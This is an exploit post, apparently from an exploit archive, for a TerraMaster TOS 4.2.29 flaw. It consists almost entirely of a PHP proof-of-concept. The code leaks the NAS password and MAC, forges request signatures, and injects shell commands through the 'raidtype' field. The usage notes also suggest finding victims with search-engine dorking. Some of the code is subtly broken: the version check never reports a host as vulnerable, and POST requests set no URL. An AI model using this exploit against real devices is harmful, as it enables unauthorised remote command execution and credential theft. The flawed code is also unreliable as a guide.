=============================================================================================================================================
| # Title : TerraMaster TOS 4.2.29 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.terra-master.com/global/alltos/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Uses cURL to send the remote command.
[+] Line 138: set your target.
[+] Save the code as poc.php.
[+] Usage: cmd => c:\www\test\php poc.php
[+] Payload:
<?php
/**
 * Proof-of-concept client for the TerraMaster TOS 4.2.29 issue named in the page header.
 *
 * Flow as implemented below: getTerramasterInfo() parses the TOS version and CPU
 * architecture out of `tos/index.php?user/login`, getData() parses leaked values out of
 * the `module/api.php?mobile/webNasIPS` response, and executeCommand() posts to
 * `module/api.php?mobile/createRaid` with a `raidtype` field that begins with `;`.
 *
 * Defender notes, all taken from the code in this class: the header arrays for both
 * `module/api.php` requests carry a 'User-Agent' value of 'TNAS'; the createRaid request
 * additionally carries 'Authorization', 'Signature' and 'Timestamp' entries derived from the
 * webNasIPS response; the injection marker is a `raidtype` form field starting with `;`.
 * Request logging on the NAS or on a fronting proxy is where these show up. The remedy is a
 * vendor update; check() treats 4.2.29 as its threshold version.
 */
class TerraMasterExploit
{
/** @var string Base URL, normalised by the constructor to end in exactly one '/'. */
private $targetUri;
/** @var array<string, mixed> Filled by getData(): password, mac, key, timestamp, signature. */
private $data = [];
/** @var array<string, string> Filled by getTerramasterInfo(): cpu_arch, tos_version. */
private $terramaster = [];
/**
 * @param string $targetUri Base URL of the device; trailing slashes are collapsed to one.
 */
public function __construct($targetUri)
{
$this->targetUri = rtrim($targetUri, '/') . '/';
}
/**
 * Populates $this->data from the `mobile/webNasIPS` endpoint.
 *
 * Nothing is stored unless the body contains 'webNasIPS successful' and decodes to JSON
 * with a non-empty 'data' member. The password is taken between the markers 'PWD:' and
 * 'SAT', the MAC after 'mac":"' up to the next '"'. The signature is md5(key . timestamp)
 * via tosEncryptStr(); the device-side checking of that value is not visible here.
 *
 * @return void
 */
public function getData()
{
// Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
$response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);
if ($response && strpos($response, 'webNasIPS successful') !== false) {
// Parse the JSON response and get the data
$resJson = json_decode($response, true);
if (!empty($resJson['data'])) {
$this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);
$this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);
$this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries
$this->data['timestamp'] = time();
// derive signature
$this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);
}
}
}
/**
 * Reproduces the device's signature scheme: an unkeyed md5 over key . value.
 * md5 of a concatenation is not a MAC; it only matches what the device expects.
 *
 * @param string     $key
 * @param string|int $strToEncrypt Value appended to $key (the timestamp in getData()).
 * @return string 32-character hex digest
 */
private function tosEncryptStr($key, $strToEncrypt)
{
$id = $key . $strToEncrypt;
return md5($id);
}
/**
 * Posts to `mobile/createRaid` with the values collected by getData() in the header array
 * and a `raidtype` field of ';' . $cmd. The response is discarded.
 *
 * @param string $cmd
 * @return void
 */
public function executeCommand($cmd)
{
// Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
$diskstring = $this->generateRandomString(4, 8);
$headers = [
'User-Agent' => 'TNAS',
'Authorization' => $this->data['password'],
'Signature' => $this->data['signature'],
'Timestamp' => $this->data['timestamp']
];
$this->sendRequest('POST', 'module/api.php?mobile/createRaid', [
'raidtype' => ';' . $cmd,
'diskstring' => $diskstring
], $headers);
}
/**
 * Populates $this->terramaster from the login page.
 *
 * Matches the first `ver=...` token up to a double quote. Architecture is inferred from
 * the token: '_A' -> ARM64, '_S' or '_Q' -> X64, anything else 'UNKNOWN'. The version is
 * whatever follows '.0_' in the token, with the closing quote stripped. Nothing is stored
 * when the request fails or the pattern does not match.
 *
 * @return void
 */
public function getTerramasterInfo()
{
// get Terramaster CPU architecture and TOS version
$response = $this->sendRequest('GET', 'tos/index.php?user/login');
if ($response) {
preg_match('/ver=.+?"/', $response, $matches);
if ($matches) {
$version = $matches[0];
// check if architecture is ARM64 or X64
if (strpos($version, '_A') !== false) {
$this->terramaster['cpu_arch'] = 'ARM64';
} elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {
$this->terramaster['cpu_arch'] = 'X64';
} else {
$this->terramaster['cpu_arch'] = 'UNKNOWN';
}
// strip TOS version number and remove trailing double quote.
$this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');
}
}
}
/**
 * Runs getTerramasterInfo() and classifies the host.
 *
 * Returns the bare string 'Safe' when no version could be parsed; otherwise a sentence
 * carrying the parsed version and architecture, intended to start with 'Vulnerable' for
 * versions at or below 4.2.29 (the comparison below) and 'Safe' otherwise. The caller at
 * file level keys on the substring 'Vulnerable'.
 *
 * @return string
 */
public function check()
{
$this->getTerramasterInfo();
if (empty($this->terramaster)) {
return 'Safe';
}
if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {
return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}
return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}
/**
 * Calls getData() and then executeCommand('whoami').
 *
 * @throws Exception when getData() stored nothing.
 * @return void
 */
public function exploit()
{
$this->getData();
if (empty($this->data)) {
throw new Exception('Cannot retrieve the leaked data.');
}
echo "Executing exploit...\n";
// Example command to execute
$this->executeCommand('whoami'); // Replace 'whoami' with desired command
}
/**
 * Sends one HTTP request with cURL and returns the raw body.
 *
 * @param string $method  HTTP verb; upper-cased before use.
 * @param string $uri     Path appended to $this->targetUri.
 * @param array  $data    Form fields, URL-encoded into the body for POST.
 * @param array  $headers Extra entries merged after the Content-Type header.
 * @return string|false   curl_exec() result: the response body, or false on failure.
 */
private function sendRequest($method, $uri, $data = [], $headers = [])
{
$url = $this->targetUri . $uri;
$options = [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => strtoupper($method),
CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)
];
if (strtoupper($method) === 'POST') {
$options[CURLOPT_POSTFIELDS] = http_build_query($data);
} else {
$options[CURLOPT_URL] = $url;
}
$ch = curl_init();
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Builds an uppercase-letter string whose length is drawn from [$minLength, $maxLength].
 * Only used for the `diskstring` form field in executeCommand(), so rand() is adequate;
 * nothing security-relevant depends on its unpredictability.
 *
 * @param int $minLength
 * @param int $maxLength
 * @return string
 */
private function generateRandomString($minLength, $maxLength)
{
$length = rand($minLength, $maxLength);
return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);
}
}
// Usage: the URL below is a placeholder for the device under test. check() runs first and
// exploit() is invoked only when its message contains the substring 'Vulnerable'.
$exploit = new TerraMasterExploit('http://target-terramaster-url.com');
$check = $exploit->check();
echo $check . "\n";
if (strpos($check, 'Vulnerable') !== false) {
$exploit->exploit();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================